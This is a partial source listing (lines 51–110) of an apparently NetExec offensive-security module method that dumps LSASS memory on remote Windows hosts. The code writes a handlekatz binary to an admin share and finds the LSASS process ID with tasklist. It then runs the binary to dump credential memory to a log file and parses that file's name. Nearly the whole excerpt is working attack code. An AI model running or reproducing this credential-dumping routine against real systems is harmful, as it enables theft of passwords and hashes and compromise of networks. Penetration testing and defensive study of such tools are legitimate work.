
Method on_admin_login

nxc/modules/handlekatz.py:53–185 (only lines 51–110 are shown below; the method body continues past the end of this listing)
(self, context, connection)


51 self.dir_result = module_options["DIR_RESULT"]
52
53 def on_admin_login(self, context, connection):
54 handlekatz_loc = self.handlekatz_path + self.handlekatz
55
56 if self.useembeded:
57 try:
58 with open(handlekatz_loc, "wb") as handlekatz:
59 handlekatz.write(self.handlekatz_embeded)
60 except FileNotFoundError:
61 context.log.fail(f"Handlekatz file specified '{handlekatz_loc}' does not exist!")
62 sys.exit(1)
63
64 context.log.display(f"Copy {self.handlekatz_path + self.handlekatz} to {self.tmp_dir}")
65
66 with open(handlekatz_loc, "rb") as handlekatz:
67 try:
68 connection.conn.putFile(self.share, self.tmp_share + self.handlekatz, handlekatz.read)
69 context.log.success(f"[OPSEC] Created file {self.handlekatz} on the \\\\{self.share}{self.tmp_share}")
70 except Exception as e:
71 context.log.fail(f"Error writing file to share {self.share}: {e}")
72
73 # get LSASS PID via `tasklist`
74 command = 'tasklist /v /fo csv | findstr /i "lsass"'
75 context.log.display(f"Getting lsass PID via command {command}")
76 p = connection.execute(command, True)
77 context.log.debug(f"Command Result: {p}")
78 if len(p) == 1:
79 p = p[0]
80
81 if not p or p == "None":
82 context.log.fail("Failed to execute command to get LSASS PID")
83 self.delete_handlekatz_binary(connection, context)
84 return
85 # we get a CSV string back from `tasklist`, so we grab the PID from it
86 pid = p.split(",")[1][1:-1]
87 context.log.debug(f"pid: {pid}")
88
89 command = self.tmp_dir + self.handlekatz + " --pid:" + pid + " --outfile:" + self.tmp_dir + "%COMPUTERNAME%-%PROCESSOR_ARCHITECTURE%-%USERDOMAIN%.log"
90 context.log.display(f"Executing command {command}")
91
92 p = connection.execute(command, True)
93 context.log.debug(f"Command result: {p}")
94
95 if "Lsass dump is complete" in p:
96 context.log.success("Process lsass.exe was successfully dumped")
97 dump = True
98 else:
99 context.log.fail("Process lsass.exe error un dump, try with verbose")
100 dump = False
101
102 if not dump:
103 self.delete_handlekatz_binary(connection, context)
104 return
105 else:
106 regex = r"([A-Za-z0-9-]*\.log)"
107 matches = re.search(regex, str(p), re.MULTILINE)
108 if not matches:
109 context.log.display("Error getting the lsass.dmp file name")
110 return
